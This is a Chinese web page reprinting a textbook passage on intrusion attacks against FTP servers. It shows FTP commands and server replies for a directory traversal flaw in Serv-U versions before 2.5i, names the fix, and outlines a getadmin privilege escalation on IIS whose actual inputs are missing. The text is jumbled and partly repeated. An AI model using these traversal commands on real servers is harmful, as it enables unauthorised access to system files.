免费邮箱 |加入收藏 | 会员中心 | 我要投稿 | RSS
您当前的位置:首页 > 服务器 > 交换技术 > 交换

6.10.1基于FTP入侵攻击

时间:2011-05-19 09:26:08  来源:站内  作者:潘春会

权限不足。

ftp>ls ..

200 PORT Command successful.

550 Permission denied.

解释:

没有权限查看上一级目录。

(2) 换种方式,输入如下命令格式:

ftp>ls .. ./*

注意:

命令格式中必须加上/*。

上一级目录(C:)中的东西尽收眼底了!

ftp>cd .. .

ftp>pwd

257 "/c:/ftproot/.." is current directory.

解释:

当前目录变成了c:ftproot..,即根目录。

这是由于.. 在这里相当于..;而且,在Serv-U分析这个目录的时候,把..当作当前目录下的子目录,而不是直接进入上一级目录。所以C盘根目录,也就是c:ftproot..被当作ftproot里面的子目录来操作。如果在Serv-U的设置中,c:ftproot被当作用户的主目录,用户可以对它和其子目录进行读和写的操作,而本来用户被禁止操作的其他目录,就可以通过这种方式当作当前目录的子目录而继承其属性,用户也可以对它读写了。假如当前在c:ftprootincoming目录,那么就可以用.. ./.. ./windows来表示c:ftproottest....windows,即c:windows目录,如果incoming目录对用户完全开放,可以进行读、写、删除、列表、建目录,那么用户也就可以对c:windows目录进行一些可怕的操作了。

经过证明 .. ..、.. ..、 .. .都等效于..。如果管理员不重视此漏洞的话,服务器就有可能被入侵都完全控制。

漏洞修补:升级Serv-U到2.5i以上的版本

[Page]

(3) 把WinNT下的cmd.exe复制到scripts文件夹下,把getadmin.exe和gasys.dll上传到scripts目录下,然后输入:

 

大约十多秒后屏幕显示:

CGI Error

这时已经把IUSR_54hack升级为Administrator,也就是任何访问该Web站的人都是

管理员。

(4) 添加用户,在浏览器中输入如下内容:

 

这样就创建了一个叫system32的用户,密码是:ffhh,然后提升权限输入如下内容:

 

(5) 入侵测试完成,完全控制目标计算机。 6.10.3 Serv-U入侵

Serv-U是一款很出色的FTP服务器软件,在网上的应用很广泛,其设置简单,小巧玲珑,很受用户喜爱。 但是在2000年12月3日Zoa_Chien (zoachien securax.org)发现了Serv-U的一个重大漏洞,这个漏洞使安装有Serv-U软件的服务器的硬盘暴露在网络上。这个漏洞在2.5i以前版本中全部存在,但是现在还有很多的网站仍然在使用2.5i以前的版本。下面就来看看入侵者是如何利用该漏洞的。

(1) 入侵者使用匿名进入一个使用Seru-U的2.5i以前版本FTP站点:

ftp>pwd

257 "/c:/ftproot" is current directory.

ftp>cd ..

550 /c:/: Permission denied.

解释:

权限不足。

ftp>ls ..

200 PORT Command successful.

550 Permission denied.

解释:

没有权限查看上一级目录。

(2) 换种方式,输入如下命令格式:

ftp>ls .. ./*

注意:

命令格式中必须加上/*。

上一级目录(C:)中的东西尽收眼底了!

ftp>cd .. .

ftp>pwd

257 "/c:/ftproot/.." is current directory.

解释:

当前目录变成了c:ftproot..,即根目录。

 


 

来顶一下
返回首页
返回首页
发表评论 共有条评论
用户名: 密码:
验证码: 匿名发表
推荐资讯
如何找出DHCP地址池里未使用的IP地址
如何找出DHCP地址池里
国内常用的DNS列表
国内常用的DNS列表
Linux邮件服务器软件比较
Linux邮件服务器软件比
学用纯CSS打造可折叠树状菜单
学用纯CSS打造可折叠树
相关文章
栏目更新
栏目热门